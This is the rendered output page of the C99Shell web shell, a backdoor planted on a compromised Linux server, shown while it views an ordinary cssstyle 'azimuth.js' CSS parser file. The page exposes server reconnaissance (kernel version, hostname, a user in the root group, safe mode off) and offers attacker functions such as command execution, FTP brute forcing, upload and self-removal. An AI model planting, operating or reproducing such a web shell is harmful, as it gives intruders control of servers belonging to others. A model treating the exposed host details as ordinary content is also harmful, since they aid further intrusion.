!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/nodejs/cssstyle/lib/properties/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     azimuth.js (2.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
'use strict';

var parsers = require('../parsers');

module.exports.definition = {
  set: function(v) {
    var valueType = parsers.valueType(v);
    if (valueType === parsers.TYPES.ANGLE) {
      return this._setProperty('azimuth', parsers.parseAngle(v));
    }
    if (valueType === parsers.TYPES.KEYWORD) {
      var keywords = v
        .toLowerCase()
        .trim()
        .split(/\s+/);
      var hasBehind = false;
      if (keywords.length > 2) {
        return;
      }
      var behindIndex = keywords.indexOf('behind');
      hasBehind = behindIndex !== -1;

      if (keywords.length === 2) {
        if (!hasBehind) {
          return;
        }
        keywords.splice(behindIndex, 1);
      }
      if (keywords[0] === 'leftwards' || keywords[0] === 'rightwards') {
        if (hasBehind) {
          return;
        }
        return this._setProperty('azimuth', keywords[0]);
      }
      if (keywords[0] === 'behind') {
        return this._setProperty('azimuth', '180deg');
      }
      switch (keywords[0]) {
        case 'left-side':
          return this._setProperty('azimuth', '270deg');
        case 'far-left':
          return this._setProperty('azimuth', (hasBehind ? 240 : 300) + 'deg');
        case 'left':
          return this._setProperty('azimuth', (hasBehind ? 220 : 320) + 'deg');
        case 'center-left':
          return this._setProperty('azimuth', (hasBehind ? 200 : 340) + 'deg');
        case 'center':
          return this._setProperty('azimuth', (hasBehind ? 180 : 0) + 'deg');
        case 'center-right':
          return this._setProperty('azimuth', (hasBehind ? 160 : 20) + 'deg');
        case 'right':
          return this._setProperty('azimuth', (hasBehind ? 140 : 40) + 'deg');
        case 'far-right':
          return this._setProperty('azimuth', (hasBehind ? 120 : 60) + 'deg');
        case 'right-side':
          return this._setProperty('azimuth', '90deg');
        default:
          return;
      }
    }
  },
  get: function() {
    return this.getPropertyValue('azimuth');
  },
  enumerable: true,
  configurable: true,
};

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--